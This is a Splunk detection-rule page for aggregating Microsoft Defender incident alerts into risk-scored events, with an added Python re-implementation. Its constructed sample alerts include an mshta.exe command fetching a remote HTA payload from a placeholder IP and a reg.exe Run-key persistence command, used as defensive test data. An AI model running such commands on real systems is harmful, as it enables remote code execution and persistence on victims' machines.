
Microsoft Defender Incident Alerts

Splunk Security Content

Summary
The Microsoft Defender Incident Alerts analytic rule aggregates and summarizes the alerts attached to Microsoft 365 Defender incidents (the incidents that roll up alerts from the Defender products, Defender for Office 365 among them). From each alert it extracts the fields an analyst needs for triage: destination host, file name, severity, command line, IP address, registry keys, and first/last seen timestamps.

The rule drops alerts whose verdict is clean, then applies a predefined severity-to-risk-score mapping so that a high-severity alert contributes more risk than a low or informational one. It also links each aggregated alert to the MITRE ATT&CK techniques that Defender reports for it, so the resulting risk events carry ATT&CK context in reports and notables.

Its main role is as a building block for risk-based alerting (RBA): rather than paging on every Defender alert, it turns each one into a scored risk event against the affected entity, which can then be correlated with other risk events and with historical activity before a notable is raised.

Deployment requires ingesting the Defender incident alerts through the Splunk Add-on for Microsoft Security, with the input configured to the sourcetype the rule's search expects; with the wrong sourcetype the search simply matches nothing. False positives vary with each tenant's Defender configuration (which policies are enabled and how aggressive they are), so tune the severity mapping and any exclusions to the environment rather than running the rule with defaults.
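The following Python re-implements the aggregation logic described above so it can be run and inspected offline. It is an added example, not the Splunk rule itself (which is written in SPL) and not code from Splunk Security Content. The field names (`verdict`, `mitre_technique_id`, `src_ip`, `registry_key`, ...), the severity-to-risk-score table, and the sample alerts are assumptions constructed for illustration; only the attack.mitre.org URL layout for techniques and sub-techniques is taken as given.

```python
"""Aggregate Defender incident alerts into scored risk events.

Mirrors what the Splunk "Microsoft Defender Incident Alerts" rule does in SPL:
drop alerts with a clean verdict, group the rest per incident, collect the
indicator fields, map severity to a risk score and attach MITRE ATT&CK links.
Field names, score values and sample data are illustrative assumptions.
"""
from collections import defaultdict

# Assumed severity -> risk score table; the real rule's values may differ.
SEVERITY_RISK = {"informational": 10, "low": 25, "medium": 50, "high": 75}


def attack_url(technique_id: str) -> str:
    """Map an ATT&CK technique ID to its page on attack.mitre.org.

    Sub-techniques such as T1059.001 live at /techniques/T1059/001/.
    """
    base, _, sub = technique_id.upper().partition(".")
    path = f"{base}/{sub}" if sub else base
    return f"https://attack.mitre.org/techniques/{path}/"


def aggregate_alerts(alerts):
    """Return one risk record per incident, skipping clean or unscored alerts."""
    groups = defaultdict(list)
    for alert in alerts:
        if str(alert.get("verdict", "")).lower() == "clean":
            continue  # the rule filters clean verdicts out before aggregating
        if str(alert.get("severity", "")).lower() not in SEVERITY_RISK:
            continue  # unknown severity: nothing to score
        groups[alert["incident_id"]].append(alert)

    records = {}
    for incident_id, items in groups.items():
        def values(field):
            # Equivalent of SPL values(): distinct non-empty values, sorted.
            return sorted({a.get(field) for a in items if a.get(field)})

        times = [a["_time"] for a in items]
        severities = values("severity")
        # The incident inherits the highest-scoring severity among its alerts.
        risk_score = max(SEVERITY_RISK[s.lower()] for s in severities)
        techniques = sorted({t for a in items for t in a.get("mitre_technique_id", [])})
        records[incident_id] = {
            "incident_id": incident_id,
            "firstTime": min(times),
            "lastTime": max(times),
            "count": len(items),
            "dest": values("dest"),
            "src_ip": values("src_ip"),
            "file_name": values("file_name"),
            "process": values("process"),
            "registry_key": values("registry_key"),
            "signature": values("signature"),
            "severity": severities,
            "risk_score": risk_score,
            "mitre_technique_id": techniques,
            "mitre_attack_url": [attack_url(t) for t in techniques],
        }
    return records


# Constructed sample alerts (not real Defender output). Times are epoch seconds.
SAMPLE_ALERTS = [
    {"_time": 1737360000, "incident_id": "INC-1001", "severity": "high",
     "verdict": "malicious", "dest": "ws-fin-07", "src_ip": "203.0.113.10",
     "file_name": "update.hta", "process": "mshta.exe http://203.0.113.10/update.hta",
     "registry_key": None, "signature": "Suspicious mshta launch",
     "mitre_technique_id": ["T1218.005"]},
    {"_time": 1737360120, "incident_id": "INC-1001", "severity": "medium",
     "verdict": "suspicious", "dest": "ws-fin-07", "src_ip": None,
     "file_name": None, "process": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater",
     "registry_key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "signature": "Run key persistence", "mitre_technique_id": ["T1547.001"]},
    {"_time": 1737360300, "incident_id": "INC-1002", "severity": "low",
     "verdict": "clean", "dest": "ws-hr-02", "src_ip": None,
     "file_name": "invoice.pdf", "process": None, "registry_key": None,
     "signature": "Attachment scanned", "mitre_technique_id": []},
    {"_time": 1737360400, "incident_id": "INC-1003", "severity": "informational",
     "verdict": "suspicious", "dest": "srv-web-01", "src_ip": "198.51.100.7",
     "file_name": None, "process": None, "registry_key": None,
     "signature": "Anomalous sign-in location", "mitre_technique_id": ["T1078"]},
]


if __name__ == "__main__":
    for record in aggregate_alerts(SAMPLE_ALERTS).values():
        print(record)
```

INC-1002 disappears entirely because its only alert has a clean verdict; INC-1001 carries the high-severity score even though one of its alerts is only medium, which is the behaviour you want from an RBA building block (the worst alert in an incident sets the floor, the rest add context).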
Categories
  • Cloud
  • Endpoint
Data Sources
  • Pod
  • Application Log
  • User Account
  • Cloud Storage
Created: 2025-01-20